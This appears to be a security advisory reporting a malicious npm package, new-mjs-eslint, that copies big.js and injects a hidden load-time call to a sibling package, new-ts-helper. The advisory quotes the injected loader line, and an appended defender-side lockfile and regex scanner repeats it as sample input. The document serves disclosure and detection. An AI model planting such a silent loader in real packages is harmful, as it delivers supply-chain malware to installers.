MAL-2026-6226
Malicious code in new-mjs-eslint (npm)
Details
## Source: amazon-inspector (b4ae24b182a00059424b8ea4800927bbbf662f0e6bf20264af611d37203a3f2e)

Package is published under the unrelated name 'new-mjs-eslint' but ships a verbatim copy of the big.js decimal-arithmetic library (original MikeMcl/big.js header, README, and source). Both main entrypoints, big.js and big.mjs, contain an injected line at lines 605-606: `const helper = require("new-ts-helper"); helper.from_str().then(e => e).catch(e => { });`. This fires on every require()/import of the package, loads the sibling dependency new-ts-helper, invokes its from_str() function, and silently swallows any error. The package name does not match its advertised content (eslint-shaped name, big.js content), the injected call sits mid-file rather than at a natural import location, and errors are deliberately suppressed — the entrypoint is a delivery vector for whatever code new-ts-helper ships, executed at load time on any installer that imports the package.
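A defender-side check for the indicators described above, as an added example (not part of the advisory or of any tool it references): it looks for the two package names in a parsed package-lock.json and for the helper load in a source file. It assumes npm's lockfileVersion 2/3 `packages` map; the function names, sample lockfile and sample source are constructed for illustration.

```javascript
// Package names taken from the advisory text.
const FLAGGED = new Set(["new-mjs-eslint", "new-ts-helper"]);

// Walk a parsed package-lock.json (assumed lockfileVersion 2/3 "packages" map)
// and report flagged packages, whether installed or only declared as a dependency.
function auditLockfile(lock) {
  const findings = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    // Keys look like "node_modules/a/node_modules/@scope/b"; keep the last name.
    const name = path.split("node_modules/").pop();
    if (FLAGGED.has(name)) {
      findings.push({ kind: "installed", name, path, version: meta.version });
    }
    for (const field of ["dependencies", "optionalDependencies", "peerDependencies"]) {
      for (const dep of Object.keys(meta[field] || {})) {
        if (FLAGGED.has(dep)) {
          findings.push({ kind: "declared", name: dep, path: path || "(root)", field });
        }
      }
    }
  }
  return findings;
}

// Return 1-based line numbers in a JS source where the helper named in the
// advisory is loaded via require(), dynamic import() or a static import.
function findInjectedLoader(source) {
  const loader = /\b(?:require|import)\s*\(\s*["'`]new-ts-helper["'`]\s*\)|\bfrom\s+["'`]new-ts-helper["'`]/;
  return source
    .split(/\r?\n/)
    .map((line, i) => (loader.test(line) ? i + 1 : 0))
    .filter(Boolean);
}

// Constructed sample inputs (versions are placeholders, not real releases).
const sampleLock = {
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", dependencies: { "new-mjs-eslint": "*" } },
    "node_modules/big.js": { version: "0.0.0-sample" },
    "node_modules/new-mjs-eslint": { version: "0.0.0-sample", dependencies: { "new-ts-helper": "*" } },
    "node_modules/new-mjs-eslint/node_modules/new-ts-helper": { version: "0.0.0-sample" },
  },
};
const sampleSource =
  'function round(x) { return x; }\nconst helper = require("new-ts-helper");\nhelper.from_str().then(e => e).catch(e => { });';

console.log(auditLockfile(sampleLock), findInjectedLoader(sampleSource));
```

To check a real project, pass the result of `JSON.parse` on its package-lock.json to `auditLockfile` and the text of a suspect entrypoint to `findInjectedLoader`.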
Affected packages
No fixed version published yet for new-mjs-eslint (npm). Pin to a known-safe version or switch to an alternative.